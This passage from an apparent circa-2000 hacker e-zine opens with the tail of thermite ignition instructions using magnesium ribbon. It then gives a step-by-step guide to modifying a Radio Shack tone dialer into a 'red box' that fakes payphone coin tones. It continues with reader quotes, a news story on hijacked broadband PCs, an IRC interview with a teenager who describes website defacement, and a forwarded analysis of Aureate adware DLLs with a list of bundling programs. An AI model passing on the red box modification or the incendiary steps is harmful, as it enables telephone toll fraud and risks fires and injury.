      MAGNISIUM IN AFTER THE THERMITE, SO THAT IT STILL STICKS OUT. LIGHT THE 
      RIBBON YOU DON'T REALY NEED A BLOWTORCH, YOU CAN LIGHT IT WITH A REGULAR 
      BUTANE LIGHTER, IT JUST TAKES LONGER. NOW GET THE FUCK BACK! THIS STUFF 
      BURNS *VERY* BRIGHTLY, SO IF THERE IS ANYONE AROUND, DON'T DO IT.

      
      
      
      ********************************************************
      *                 SHOP CLASS -- EGGO                   *
      *                                                      *
      *      THE NOT-QUITE-AS-POOR MAN'S TONE DAILER         *
      ********************************************************
      
      
      SO YOU AREN'T QUITE AS POOR AS LAST MONTH, YOU EITHER: 1) KNOCKED OVER A 
      LIQUOR STORE 2) YOU ELECTRONICLY TRANSFERED MILLIONS OF DOLLARS INTO YOUR 
      SWISS BANK ACCOUNT. WHICH EVER IT WAS, YOU HAVE SOME MONEY NOW, SO LET'S 
      BUILD SOMTHING.

      FIRST THINGS FIRST, GO GET A RADIO SHACK TONE DIALER (THE CHEAP ONE, $16. 
      YOU'RE STILL POOR REMEMBER?). TAKE IT HOME AND CRACK IT OPEN. BE SURE TO 
      BURN THE BOX AND ALL THE DOCS,       (BECAUSE YOU'RE SO 1337, THE FEDS ARE 
      GOING THROUGH YOUR TRASH) AND REPLACE THE CRYSTAL WITH YOUR 'LEET NEW 
      REDBOX XTAL. NOW, I KNOW WHAT YOU'RE SAYING, "BUT EGGO, I CAN ONLY MAKE 
      NICKLE TONES--BECAUSE I'M POOR." AND MY RESPONSE IS,"SHUT UP, I'M GETTING 
      TO THAT PART!"

      WHAT YOU NEED TO DO NOW, IS PUT A MOMENTARY TACT SWITCH (NORMALY OPEN) 
      ACROSS PINS ONE AND SIXTEEN. RUN THE SWITCH TO SOMEWHERE ON THE CASE, 
      CLOSE IT UP, AND YOU'RE READY TO       GO.

      TURN ON THE DIALER, PUNCH IN FIVE *'S AND PRESS YOUR NEW BUTTON. WAIT 
      THREE SECONDS, AND THERE YOU GO, A QUARTER TONE! APPARENTLY THE CHIP 
      STORES THE LAST 31 NUMBERS PRESSED       SENCE YOU TURNED IT ON. YOU HAVE 
      TO PUT IN THE *'S EVERY TIME, BUT HEY, YOU'RE POOR. 

      OTHER NOTES: IF YOU PUT THE SWITCH ACROSS PINS 16 AND 8, YOU WILL GET A 
      TONE BEFORE IT PLAYS BACK THE QUARTER TONE, I HAVE NO IDEA WHAT FREQ, OR 
      WHY IT'S THERE, BUT IT IS. I FOUND ALL       THIS STUFF OUT WHILE TRYING 
      TO FIND DTMF A-D, THIS CHIP CAN'T MAKE THEM.
      
      
      ********************************************************
      *                    GREAT QUOTES                      *
      *                                                      *
      *       VARIOUS QUOTES THAT I THOUGHT WERE GOOD        *
      ********************************************************
      
      FROM MTV'S CHOOSE OR LOSE PUBLIC FORUM (WHATEVER YOU MAY SAY ABOUT MTV, 
      THEY DID PUBLISH THESE, REGARDLESS OF THE VIEWS EXPRESSED IN THEM):

      

      DON'T WANT MY MTV       I'm a high school student. I do not possess the 
      right to wear a shirt that has an anti-swastika symbol. I do not possess 
      the right to write about faculty and administrative decisions in a 
      negative light. I do not possess the right to privacy within my locker. I 
      cannot distribute a "zine" or alternative newspaper in my school for fear 
      of expulsion.

      I'm sick of being censored, and so I dare you, MTV, to censor me based on 
      this following comment: MTV is nothing but a cheapening of art. It takes 
      music and turns it into commercials. It finds what sells and then airs it, 
      ultimately in order to sell that       oh-so-precious product, the viewer.

      Choose or lose? It's ironic that MTV should start a campaign like this. It 
      almost implies that MTV is a socially conscious network. But then I glance 
      at the screen, and swoosh-- just do it.

      Or maybe I see Brittany Spears televised like an artificial piece of 
      meat-- am I suppose to crave this girl? She is my age. We've all got 
      hormones, we've all got innocence, they're gonna be lost sometime, right 
      MTV?

      Then there's Kid Rock. A real role-model with his degradation of women and 
      his promotion of a lifestyle of recklessness, apathy, selfishness. Take 
      what you can. But he put out a slow song. Should I feel bad for him, he 
      almost seems like he's been victimized?       Hah. Sex sells, especially 
      cheap sex, to the desperate adolescent in us all, right MTV?

      Fred from Limp Bizkit, now that is a cool guy, nice red Yankees hat there. 
      Anyone ever mention Fred's ploy to get airtime on major radio stations? Or 
      how 'bout his inciting the riot at Woodstock and then denying 
      responsibility. He's a cool cat though, it's       alright. Violence sells 
      to angst-ridden teens, right MTV?

      Pop-punk, swing, and ska, go ahead, rape the subcultures. Money is money, 
      profit is profit, right MTV?

      Choose or Lose?       Choose who? Democrats, Republicans. Lose who? 
      Everyone looking for a choice.

      Who cares. Isn't that what you want in the end? Me not to care about 
      anything but Brittany's breast size and Travis' latest tattoo. And where 
      in the world is Carson Daly now? Coming up, after this...swoosh, just do 
      it.
      
      -dhcgrrl, FL
      
      
      
      People don't care about politics because we're living in an age of 
      prosperity. It seems each day I tune into CNN to learn of another Wall St. 
      record. Meanwhile, globalization and exploitation is proliferating, under 
      the booming surface. As long as we see green (cash of course, the 
      corporations are sawing through the real greens of South America), 
      everything is alright. But it's not. American culture is dead. All we've 
      got are some glamorous Barbie dolls and Ken with his clique, singing about 
      love and lost love. We're rotting away in this plastic life. The media, 
      the corporations, the candidates, they'd prefer to keep us drugged, 
      distracted from the real issues that are affecting and will affect real 
      lives. I don't want to hear about a Christian's moral crusade or Bush's 
      drug history. I don't care about the sex life of anyone but me. I don't 
      care about the slight differences in health-care plans. I care about 
      sanctions that kill millions of Iraqi children, or U.S concrete bombs that 
      ruin their homes. I care about money in politics. I care about politicians 
      who have mastered the deceptive art of being politicians. I care about 
      health care. I care about the inner-cities falling apart and the homeless 
      too scared to enter homeless shelters (and so we apply the handcuffs). I 
      care about the mentally-ill that roam our cities. I care about 
      multinational corporations treating the environment like an imperial 
      venture. I care about that seven year-old who made your Nikes. I care 
      about that potato that isn't quite as natural as it looks. I care about 
      the false sense of NATO's purpose. I care about a media that is supposed 
      to keep me informed but is too distracted by my buying power. I'm an 
      adolescent male, I like Vans shoes and listen to punk rock. I drink root 
      beer, I like its taste. Go ahead and buy me, NBC. Try to take my soul, 
      Fox. I'll give you 120 minutes of my time MTV, come and get me... try.

      -bored in the USA, DC 
      
      
      
      SIG LINE HALL OF FAME:
      
      "Windows is a 32bit graphical shell which links to a 16 bit patch to a 
      8bit operating system made to run on a 4 bit microprocessor by a 2 bit 
      company that can't stand one bit of competition." --Usurp, via usenet
      
      
      
      
      ********************************************************
      *                  CONCLUTION--EGGO                    *
      ********************************************************
      WELL, THIS EDITION WAS MUCH HARDER THAN THE FIRST, BUT I THINK IT TURNED 
      OUT ALLRIGHT. I STILL NEED ARTICLES, SO IF YOU HAVE SOMTHING TO EXPRESS 
      (UPL TURNED DOWN YOUR ARTICLE?--SEND IT MY WAY), SEND IT TO: 
      EGGOTWRP@HOTMAIL.COM

      
      
      ---------------------------------------------------
      I FREQUENT ALT.PHREAKING ON USENET SO LOOK FOR MY WISE [[chuckle]] WORDS 
      THERE. BUT READ THE FAQ FIRST!! IT CAN BE FOUND AT: 
      http://members.tripod.com/SeusslyOne WANT TO TELL ME HOW LEET I AM? 
      GENERALY KISS MY ASS? CALL ME A DUMB FUCK? I CAN BE REACHED AT 
      EGGOTWRP@HOTMAIL.COM I RESPOND TO (MOST) MAIL, SO IF YOU WANT TO ASK ME 
      SOMTHING THAT IS YOUR BEST BET.

      COPYWRITE (C) 2000 BY EGGO
      
      
      
      phew!, how was that for retro eh? reminded me of p-80 systems... - Ed
      best of luck and all power to em I say.
      
      
      
      @HWA
      
      
09.0  Has your PC been Hi-Jacked??
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Submitted by Twstdpair
      via MSNBC/ZDNN
      http://www.msnbc.com/news/371497.asp?cp1=1#BODY
      
      
      Has your PC been hijacked?
      If you subscribe to cable modem or DSL service, youre at risk
                                                             By Robert Lemos
                                                             ZDNN

      Feb. 17  Its 3 a.m. Do you know whos on your computer? Security experts
      warn that network intruders once only a boogeyman for large corporations 
      and government agencies are becoming an increasing threat to home users,
      especially those wired to the Internet via new broadband connections such
      as cable modem and DSL.
      
      What should have been the news is that there were hundreds and thousands 
       of computers taken over by the attackers, and that the owners not only 
       didnt know that they got broken into and taken over, but were not 
       monitoring their systems. 
       
       - EUGENE SPAFFORD
         Purdue University computer
         science professor 
         
         
            HOME USERS dont have the right security tools nor
     the understanding about why they need them, said Eugene
     Spafford, computer science professor and security expert at
     Purdue University. They are much more likely to be prone
     to attack, or their machines used in distributed, coordinated
     attacks. 
            Last week, denial-of-service attacks downed, or
     slowed to a crawl, eight major Internet sites  Yahoo!,
     Amazon, Microsofts MSN.com, eBay, E*Trade,
     Buy.com, Time Warners CNN.com and ZDNet. 
            
            Yet that should not have been the major story, said
     Spafford. What should have been the news is that there
     were hundreds and thousands of computers taken over by
     the attackers, and that the owners not only didnt know that
     they got broken into and taken over, but were not
     monitoring their systems. 
            
     MIXTER: USERS ARE HOPELESS VICTIMS
     
     
            With the advent of always-on, high-speed Internet
     connections, home computers with little if any 
     security are quickly becoming the No. 1 target for online
     vandals to use as a staging ground to shoot for more
     lucrative marks. 
     
     Most broadband users are hopeless victims, said the
     German white-hat hacker known as Mixter, during a Tuesday
     interview over Internet relay chat.
                              
     Especially, when theyre running Windows and have no good
     technical knowledge. 
                         
     Mixter created a denial-of-service program, known as the
     Tribe Flood Network, which many believe was the tool of
     choice for the Web attackers last week. The attackers 
     first had to compromise computers and seed each one with
     the program weeks or months before the attack. 
     
            This week, a computer believed to have been used in
     last weeks attacks on Yahoo! and other major Web sites
     was reportedly seized by federal agents in Hillsboro, Ore.
     The PCs owner allegedly had no knowledge that the
     computer was being used as a zombie to stage attacks. 
             
                
     THE CASE OF CHRISTIAN CRUMLISH
     
            For most users, installing a personal firewall can stop
     most such illicit use. Just ask Christian Crumlish of the
     importance of a good firewall. 
            Spooked by last weeks attacks, the Waterside
     Productions literary agent downloaded Zone Labs Inc.s
     free firewall, ZoneAlarm 2.0, and installed the electronic
     gate onto his DSL-connected PC. Other personal firewall
     products include BlackICE Defender and Norton Internet
     Security 2000. 
     
            My system had slowed at seemingly random times in
     the past, said Crumlish. But I never really thought I would
     find anything. 

     Against expectations, Crumlish found three programs that, 
     together, opened up his PC for use by cyber vandals. The
     programs  run.exe, msr.exe.exe and kerrne1.exe  were the
     pieces to a backdoor app known as SubSeven. 
     
            Whoever installed the programs has come back
     knocking at the trapdoor he left behind, Crumlish said. I
     have detected three or four attempts to get into my system
     since I installed ZoneAlarm, said Crumlish, who added that
     without the urging of a friend, he would never had thought to
     put the firewall on his system. 
     
            Broadband providers are not telling their customers
     about the threats that they have to worry about, he said. In
     fact, more than 400,000 users have taken matters into their
     own hands and downloaded copies of ZoneAlarm since the
     attacks last week. Such incidences are quickly convincing
     broadband companies to change their tune. 
            
     FLASHCOM NIXES USERS FIREWALL
     
            One subscriber to broadband Internet service provider
     Flashcom Communications Inc. complained to ZDNet
     News that the company would not let him install a firewall.
      
      They said they would not support a firewall, and if I
     installed one, they would disconnect me from the system,
     said Jann Linder, a Silicon Valley Web programmer. 

            Flashcom denied that it would prohibit any subscriber
     from setting up a firewall. Setting up a firewall is not a
     trivial thing to do, said Richard Rasmus, president and chief
     operating officer for the Huntington Beach, Calif., company.
      
      We dont do anything to defeat or frustrate a firewall that a
     customer set up for themselves. But there is a distinction
     between that and supporting a product.
      
            The company is now in the process of evaluating
     firewall products to select one that it will support in the
     future. 
            Excite@Home has also seen the light. The
     broadband-over-cable provider signed a deal with
     MacAfee to sponsor a security zone for subscribers by
     March and offer its personal firewall product to @Homes
     cable modem customers. 
            The attention to such security details could not come
     quick enough, said Gregor Freund, president of firewall
     maker Zone Labs. According to the company, attackers
     can directly access the hard drives of approximately 10
     percent of home computers without having to circumvent
     security. 
            
            (Those users) computers are completely wide open,
     he said. Such attacks are almost ubiquitous, he added,
     pointing out that during a 10-minute interview, six attacks
     occurred on his own companys system. 
     
            We are a target, of course, but the bottom line is that
     people have to take responsibility for their own machines. 
     
     @HWA
     
     
                         
                         
10.0 Interview with Sect0r
     ~~~~~~~~~~~~~~~~~~~~~
     
      [19:58] <sect> okay.
      <Cruciphux> hi
      [19:58] <sect> how's it going?
      <Cruciphux> i'm doing great, you??
      [19:58] <sect> pretty good.
      <Cruciphux> are you in any groups currently? and if so what do they do? if
                  not what are your current projects if any?
      <Cruciphux> >i'll jump around a wee bit here<
      [19:59] <sect> okay.
      <Cruciphux> and u can refuse to answer any questions btw, just gimme a 
                  'no comment' :)
      [19:59] <sect> well i'm with gH and i think i'm getting back in defiance.
      <Cruciphux> I heard a rumour you were 'kicked from gH' is this not true?
      [20:00] <sect> defiance if a group i was in about 8 months ago, you might
                     recall, with st0rm, ne0h, etc.
      <Cruciphux> yes
      [20:00] <sect> haha, me and most have issues now with me getting into some 
                     stuff, they aren't even really active.
      <Cruciphux> they were defacing if I remember correctly?
      [20:00] <sect> who?
      <Cruciphux> defiance? I could be mistaken.
      [20:01] <sect> yeah, we did some stuff.
      <Cruciphux> on attrition?
      <Cruciphux> was it just for kicks?
      [20:01] <sect> yes.
      [20:01] <sect> haha, you could say that.
      <Cruciphux> if i may ask how old are you?
      [20:01] <sect> about gH, me and shekk are really cool, i don't know how 
                     that's going to work out, i don't really care anymore, 
                     because gH is pretty much dead anyway, everyone knows that.
      [20:01] <sect> i'm 15.
      <Cruciphux> ok
      <Cruciphux> do you code?
      [20:01] <sect> yes.
      <Cruciphux> write your own exploits?
      [20:02] <sect> no exploits yet, i've done tools, etc.
      [20:02] <sect> i code C, pascal, and i'm working with asm now, getting more 
                     into it.
      <Cruciphux> what sort of tools? are they publically available?
      <Cruciphux> ok
      [20:02] <sect> you might have seen the plusmail exploit recently herf found, 
                     me and ytcracker talked about that.
      <Cruciphux> may have it doesn't ring any bells.
      <Cruciphux> I saw a recent defacement that dissed you on a .mil site are you
                  aware of this defacement?
      [20:03] <sect> i wrote up a scanner, but still haven't found any differences 
                     in non-vulnerable and vulnerable sites, it just displays 
                     whether they are running the script.
      [20:03] <sect> yes i am.
      <Cruciphux> who was behind it and do you have any response to it or want to 
                  brush it off?
      [20:03] <sect> i had someone akicked from #hackers on dalnet, the kid 
                     retaliated, what can i say?
      <Cruciphux> heh
      <Cruciphux> ok
      <Cruciphux> typical irc fun
      [20:04] <sect> that would be blazinweed, he is basically a wannabe with no 
                     skills to speak of.
      <Cruciphux> he's a dalnet guy?
      [20:04] <sect> i would have re-defaced his stuff easily (nt boxen), but i'm 
                     not down with that anymore.
      [20:04] <sect> yes he is.
      <Cruciphux> what nets do you frequent most? 
      [20:04] <sect> typical :)
      [20:04] <sect> dalnet and efnet.
      [20:05] <sect> i founded #crontab on dalnet, i hang there most.
      <Cruciphux> whats behind the recent #feed-the-goats and #sesame takeovers and
                  do you still own those channels?
      [20:05] <sect> haha.
      [20:05] <sect> well.
      <Cruciphux> more politics?
      [20:05] <sect> indeed.
      [20:05] <sect> i'm usually not into that kind of stuff.
      <Cruciphux> anything you want to share i'm all ears :)
      <Cruciphux> the floor is yours
      [20:05] <sect> yeah sure.
      <Cruciphux> g/a
      [20:05] <sect> basically, eckis and bob- are script/packet kiddies.
      [20:05] <sect> hehe.
      [20:06] <sect> and bob- likes to run his mouth.
      [20:06] <sect> #sesame was started by dap, ytcracker, and myself.
      [20:06] <sect> when sSh was small.
      [20:06] <sect> bob- had NOTHING to do with it.
      [20:06] <sect> so if you think about it, that channel is rightfully mine.
      <Cruciphux> so its a personal thing mainly with bob- ?
      [20:06] <sect> yes, and eckis.
      <Cruciphux> ytcracker usually is in there or was until very recently
      <Cruciphux> he claims to be the 'new SSH'
      [20:07] <sect> yeah he chills in there.
      [20:07] <sect> there is no sSh anymore, heh.
      [20:07] <sect> ftg was on the same basis.
      <Cruciphux> hrm
      [20:07] <sect> after i received the packets, etc, heh.
      [20:07] <sect> debris approached me about that.
      <Cruciphux> yeah they 'died' a long time ago and then there was Goat Security
                  which also died, then the chan just became a place to chill
      <Cruciphux> so why bother taking it over?
      [20:07] <sect> informed him that i 'schooled' bob- on various topics, he told
                     me that he's sure i did.
      <Cruciphux> hehe
      [20:08] <sect> so debris and i spoke.
      <Cruciphux> are you and debris on good terms?
      [20:08] <sect> he asked me some asm questions to confirm what i had said about
                     my skills.
      <Cruciphux> ah
      [20:08] <sect> and i answer them all of course.
      [20:08] <sect> :)
      <Cruciphux> :)
      [20:08] <sect> anyway.
      [20:08] <sect> no, me and debris are not.
      <Cruciphux> ok
      [20:09] <sect> and i have no desire to be friends with any of them.
      <Cruciphux> does gH or defiance have a website?
      [20:09] <sect> the politics of irc doesn't concern me, i have a real life to 
                     live, know what i mean?
      [20:09] <sect> no.
      <Cruciphux> yeah man
      <Cruciphux> planning on one?
      [20:09] <sect> ummm.
      [20:09] <sect> defiance has a little site up, but i can't give that out at this
                     point.
      [20:09] <sect> private code, etc.
      <Cruciphux> ok
      <Cruciphux> will it be a hacking group, security group, coding group or whatever
                  the fuck we feel like group?
      <Cruciphux> :)
      [20:10] <sect> haha.
      [20:10] <sect> st0rm has some big plans.
      <Cruciphux> or all of the above?
      [20:10] <sect> knowing him it wont be quite legit ;D
      [20:10] <sect> well, i will release code under defiance.
      [20:11] <sect> i can't speak for the rest of the group.
      <Cruciphux> is tcpdump your own box?
      [20:11] <sect> no.
      <Cruciphux> ok
      [20:11] <sect> good friend.
      <Cruciphux> cool
      [20:11] <sect> hence the 'crontab'.
      <Cruciphux> nod
      <Cruciphux> I had something else I wanted to ask and its slipped my mind damn
      <Cruciphux> hang one sec
      <Cruciphux> (gettin old)
      <Cruciphux> :)
      [20:12] <sect> no problem.
      <Cruciphux> oh yeah, whats your view on the 'scene' in general? and what do you 
                  have to say about the new groups? or old ones for that matter, and 
                  who if anyone do you respect?
      [20:13] <sect> well.
      [20:13] <sect> the scene sucks.
      [20:13] <sect> :)
      <Cruciphux> )
      [20:13] <sect> irc politics, packeting, defacing, etc etc.
      [20:13] <sect> it's getting very old.
      [20:13] <sect> new groups?>
      [20:13] <sect> new groups? i don't think any are worth mentioning.
      <Cruciphux> I see a lot of new or fake names/groups on current web defacements for 
                  instance
      [20:14] <sect> yeah.
      [20:14] <sect> i don't like defacing in general.
      [20:14] <sect> if you find a sploit, go for it.
      <Cruciphux> I think many of those are old timers having fun and doing it 
                  anonymously when drunk etc 
      <Cruciphux> yeh
      [20:14] <sect> but i know for a fact the skilled coders out there aren't defacing.
      <Cruciphux> are you planning a career in security?
      <Cruciphux> or?
      [20:14] <sect> yes or system administration.
      <Cruciphux> nice to have an OC48+ behind you when ircing huh? *g*
      [20:15] <sect> lol.
      [20:15] <sect> indeed.
      <Cruciphux> work and play at the same time
      [20:15] <sect> yeah.
      [20:15] <sect> i mean.
      [20:15] <sect> things like defacing get you no where.
      [20:15] <sect> how does dissing someone on a defaced page prove anything?
      [20:15] <sect> nobody really cares, someone gets a laugh, moves on.
      <Cruciphux> I agree
      <Cruciphux> did you hear about the recent Fuqrag raid?
      <Cruciphux> he as raided last thursday
      [20:16] <sect> by defacing these no name pages without a message, you are doing
                     nothing.
      <Cruciphux> as=was
      [20:16] <sect> well.
      [20:16] <sect> what can i say?
      <Cruciphux> dunno, no opinion?
      [20:16] <sect> i mean, the stuff he did was pointless as well.
      [20:16] <sect> again, no message.
      <Cruciphux> he was up to more than defacing, that came secondary
      [20:16] <sect> just small government sites with little traffic.
      [20:16] <sect> well.
      [20:17] <sect> heh.
      [20:17] <sect> i only spoke with him a few times.
      <Cruciphux> hes looking at big time jail time from what i've heard of his 
                  situation from him.
      [20:17] <sect> again, this stuff gets you no where.
      <Cruciphux> nod
      <Cruciphux> ok guess that about does it unless you have anything you'd like to ad,
                  like shoutouts greets fucku's etc
      [20:18] <sect> haha.
      [20:18] <sect> well.
      [20:18] <sect> i'd like to say hi to all my bros in #crontab dalnet, they're a 
                     real crew, good people.
      <Cruciphux> ok
      [20:18] <sect> and all these kids that think defacing no name sites will get you
                     somewhere, think about what you're doing, you have your whole 
                     lives ahead of you.
      [20:18] <sect> that's it from me :)
      <Cruciphux> thanks for your time, is it ok to hang in #crontab now and then?
      [20:19] <sect> yes of course ;)
      <Cruciphux> and are ya giving them chans back? :-))))))
      <Cruciphux> I found them most entertaining
      <Cruciphux> LOL
      [20:19] <sect> hehe, i don't see that happening.
      [20:19] <sect> #sesame at least.
      <Cruciphux> ok
      <Cruciphux> tnx for that interview it'll be in the next release.
      [20:20] <sect> ok take it easy.
      <Cruciphux> cya
      Session Close: Thu Feb 24 20:20:12 2000
      
      @HWA

                           
11.0 Is aureate.com spying on you?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.hardocp.com/news_images/2000/february_2000/aureatespying.html
     
     
     
     
    February 24, 2000



    Are you being spied on?

    IF this is true, I sure the hell am..

    it seems that a company named aureate.com has been secretly collecting data off
    everyone who uses applications that incorprate their banner ad software. look at
    the below e-mail for details. also its true last night the freind that sent me 
    this ran netstat -a to monitor his ports and sure enough while running gozilla 
    and downloaading something through it . aureate was in there checking out his
    machine and activites
    
    > hi
    > this implies that even repuatable sources of software, i.e., zdnet, can
    > use
    > this for marketing purposes
    > 
    > how do we close this port or others?
    > ----- Original Message -----
    > From: "MJE" <mark@NTSHOP.NET>
    > To: <win2ksecadvice@LISTSERV.NTSECU RITY.NET>
    > Sent: Wednesday, February 23, 2000 11:14 AM
    > Subject: Aureate Spies on You
    > 
    > 
    > > Forwarded from another list -- anyone know about this Aureate spying
    > stuff?
    > > Be sure to check the list of apps that allegedly contain this code --
    > it's
    > > at the bottom of the message.
    > >
    > > MJE
    > >
    > >
    > >
    > > > -----Original Message-----
    > > > From: Edward (Ted) Burton [mailto:egburton@CONSULTBURTON.COM]
    > > > Sent: Monday, February 21, 2000 2:02 PM
    > > > To: Lawyers and the Internet
    > > > Cc: Craighead, Paula
    > > > Subject: [NET-LAWYERS] Aureate Spy
    > > >
    > > >
    > > > While I am not a Windows user, the following information has popped
    > > > up on the LawTech list and is of some interest to attorneys who wish
    > > > to not leave a paper trail out there on the Internet for commercial
    > > > use by others.
    > > >
    > > > According to Dale Haag, <dhaag@NOL.NET>
    > > >
    > > > The following is a listing of all software known to install the
    > > > Aureate spy on your system. The Aureate spy keeps track of your
    > > > Internet activities and sends a report to Aureate every time you open
    > > > your browser. The Aureate spy places the following files on a Windows
    > > > machine. [It is not known, yet, to affect Macintosh or Linux
    > > > machines.]
    > > >
    > > > The installed files are some or all of:
    > > >
    > > > adimage.dll
    > > > advert.dll
    > > > advpack.dll
    > > > amcis.dll
    > > > amcis2.dll
    > > > amcompat.tlb
    > > > amstream.dll
    > > > anadsc.ocx
    > > > anadscb.ocx
    > > > htmdeng.exe
    > > > ipcclient.dll
    > > > msipcsv.exe
    > > > tfde.dll
    > > >
    > > >
    > > > ========== ========== ========== ==========
    > > > Dale said:
    > > >
    > > > OK folks, living up to my reputation as a "bulldog" when I get my
    > > > teeth into something, I have been busy "reviewing" the contents and
    > > > code contained in the DLL's that Aureate makes use of. Here are a
    > > > few of my findings up to this point:
    > > >
    > > > advert.dll
    > > > =======
    > > >
    > > > This DLL creates a hidden window every time you open your browser. It
    > > > creates and sends 4 pages of information to the Aureate servers using
    > > > port 1749 on your system, these pages include:
    > > >
    > > > 1. Your name as listed in the system registry ( not the name you
    > > > installed one of the programs with )
    > > > 2. Your IP address
    > > > 3. The reverse DNS match of your address. ( tells them what ISP and
    > > > area of country you are in )
    > > > 4. A listing of ALL software that is shown in your registry as being
    > > > installed. ( Not just the companies they work with )
    > > > 5. This DLL sends the following information to their server on all
    > > > URL's you visit:
    > > > A.) ad banners you may click on
    > > > B.) all downloads you do showing the filename/file
    > > > size/date/time/type of file(image, zip,executable, etc)
    > > > C.) full time and date stamps of all your actions while
    > > > using your
    > > > browser
    > > > D.) the remote dialup number you are dialing in on (taken out of
    > > > your dialer configuration)
    > > > E.) dialup password if saved, does not "appear" at first glance
    > > > to send this through to them.
    > > > 6. Contains programmers note: "Show me the money! I want to
    > > > be Mike!"
    > > >
    > > >
    > > > advpack.dll
    > > > =========
    > > >
    > > > Used during the installation only to check for other needed files.
    > > > amcis.dll
    > > > =======
    > > >
    > > > This DLL modifies the following registry keys:
    > > > 1. HKEY_CURRENT_CONFIG
    > > > 2. HKEY_DYN_DATA
    > > > 3. HKEY_PERFORMANCE_DATA
    > > > 4. HKEY_USERS
    > > > 5. HKEY_LOCAL_MACHINE
    > > > 6. HKEY_CURRENT_USER
    > > > 7. HKEY_CLASSES_ROOT
    > > >
    > > > Unregisterss oleaut32.dll from memory as provided by M$oft and
    > > > replaces with its own calls. Switches back to M$oft's when browser is
    > > > closed. Creates stub processes to be started anytime your browser is
    > > > opened.
    > > >
    > > >
    > > > amcompat.tlb
    > > > ===========
    > > >
    > > > This guy tracks any multimedia clips ( video/pictures/sound ) that
    > > > you view It tracks the rating level on the video/picture/sound and
    > > > title / location Contains references to DblClick ( still digging on
    > > > this one! )
    > > >
    > > >
    > > > amstream.dll
    > > > ==========
    > > >
    > > > Setups TWO way communications between your system and theirs.
    > > > Used to send info and receive update commands/files
    > > > Open port 1749 for communications
    > > >
    > > > ==================================================
    > > >
    > > > The programs that are known to install the Aureate spy are:
    > > >
    > > > 123Search
    > > > 3d Anarchy
    > > > s3D-FTP
    > > > 3rd block
    > > > Abe's FTP Client
    > > > Abe's Image Viewer
    > > > Abe's MP3 Finder
    > > > Abe's Picture Finder
    > > > Abe's SMB Client
    > > > Access Diver III
    > > > Acorn Email
    > > > AcqURL
    > > > ActionOutline Light 1.6
    > > > Active 'Net
    > > > Add URL
    > > > Add/Remove Plus!
    > > > Address Rover 98
    > > > Admiral VirusScanner
    > > > Advanced Call Center
    > > > Advanced Maillist Verify
    > > > AdWizard
    > > > Alive and Kicking
    > > > alphaScape QuickPaste
    > > > ASP1-A3
    > > > Auction Explorer
    > > > Aureate Group Mail
    > > > Aureate SpamKiller
    > > > AutoFTP PRO
    > > > AutoWeb
    > > > AxelCD
    > > > Beatle
    > > > Binary Boy
    > > > BinaryVortex
    > > > Blue Engine
    > > > BookSmith : Original
    > > > buddyPhone 2
    > > > Calypso E-mail
    > > > CamGrab
    > > > Capture Express 2000
    > > > Cascoly Screensaver
    > > > CDDB-Reader
    > > > CDMaster32
    > > > ChanStat
    > > > Charity Banner
    > > > Cheat Machine
    > > > Check4New
    > > > ChinMail
    > > > Clabra clipboard viewer
    > > > Classic Peg Solitaire
    > > > ComTry Music Downloader
    > > > Crystal FTP
    > > > CSE HTML Validator Lite
    > > > CuteFTP 3.0
    > > > CuteFTP 3.0
    > > > CuteFTP/Tripod
    > > > CuteMX
    > > > CutePage
    > > > Danzig Pref Engine
    > > > DateTime
    > > > Delphi Component Test
    > > > Delphi Tester
    > > > Dialer 2000
    > > > DigiBand NewsWatch
    > > > DigiCams - The WebCam Viewer
    > > > Digital Postman
    > > > DirectUpdate
    > > > DL-Mail Pro 2000
    > > > DNScape
    > > > Doorbell 1.18
    > > > Download Minder 1.5
    > > > Download Wonder
    > > > DownLoader v.1.1
    > > > Dwyco Video Conferencing
    > > > EasySeeker
    > > > EmmaSoft ChatCat
    > > > EmmaSoft dBrow
    > > > EmmaSoft KeepLan
    > > > EmmaSoft Soundz
    > > > EnvoyMail
    > > > EZ-Forms FREE
    > > > File Mag-Net
    > > > FileSplit
    > > > Folder Guard Jr.
    > > > FourTimes
    > > > Free Picture Harvester
    > > > Free Solitaire
    > > > Free Spades
    > > > Free Submitter Pro
    > > > FreeImageEditor
    > > > FreeIRC
    > > > FreeNotePad
    > > > FreeSite
    > > > FreeWebBrowser
    > > > FreeWebMail
    > > > FreeZip!
    > > > FTPEditor
    > > > GetRight
    > > > Go!Zilla
    > > > Go!Zilla WebAttack
    > > > GovernMail
    > > > Grafula
    > > > Gunther's PasswordSentry
    > > > HangWeb
    > > > hesci Private Label
    > > > HTML Translator
    > > > HTTP Proxy-Spy
    > > > Huey v1.8 Color Picker
    > > > Iban Technologies IP Tools 3.1
    > > > Idyle GimmIP
    > > > Idyle GimmIP
    > > > iFind Graphics
    > > > imageN
    > > > Infinite Patience
    > > > InfoBlast
    > > > InnovaClub
    > > > InstallZIP
    > > > Internet Tree
    > > > Internetrix
    > > > InterWebWord Companion
    > > > JetCar
    > > > JFK Research
    > > > jIRC
    > > > JOC Email Checker
    > > > JOC Web Finder
    > > > JOC Web Spider
    > > > KVT Diplom
    > > > LapLink FTP
    > > > LineSoft Download
    > > > LOL Chat
    > > > LOL Chat
    > > > Mail Them
    > > > Meracl FontMap
    > > > Meracl ImageMap Generator
    > > > Midnight Oil Solitaire
    > > > MirNik Internet Finder
    > > > More Space 99
    > > > MouseAssist
    > > > MP3 Album Finder
    > > > MP3 Fiend
    > > > MP3 Grouppie
    > > > MP3 Mag-Net
    > > > MP3 Renamer
    > > > Mp3 Stream Recorder
    > > > MP3INFO-Editor
    > > > MultiSender
    > > > Music Genie
    > > > MX Inspector BIG AD
    > > > My Genie Patriots
    > > > My Genie SE
    > > > My GetRight
    > > > NeatFTP
    > > > Net CB
    > > > Net Scan 2000
    > > > Net Vampire
    > > > Net-A-Car Feature Car Screensaver
    > > > NetAnts
    > > > NetBoard
    > > > Netbus Pro 2.10
    > > > NetCaptor 5.0
    > > > Netman Downloader
    > > > NetNak
    > > > NetSuck 3.10.5
    > > > NetTime Thingy
    > > > Network Assistant
    > > > NeuroStock
    > > > NewsBin
    > > > NewsShark
    > > > NewsWire
    > > > NfoNak
    > > > NotePads+
    > > > Notificator 1.0b
    > > > Octopus
    > > > Pattern Book
    > > > People Seek 98
    > > > Personal Search Agent
    > > > Photocopier
    > > > PicPluck
    > > > Pictures In News
    > > > Ping Thingy
    > > > PingMaster
    > > > Planet.Billboard
    > > > Planet.MP3Find
    > > > PMS
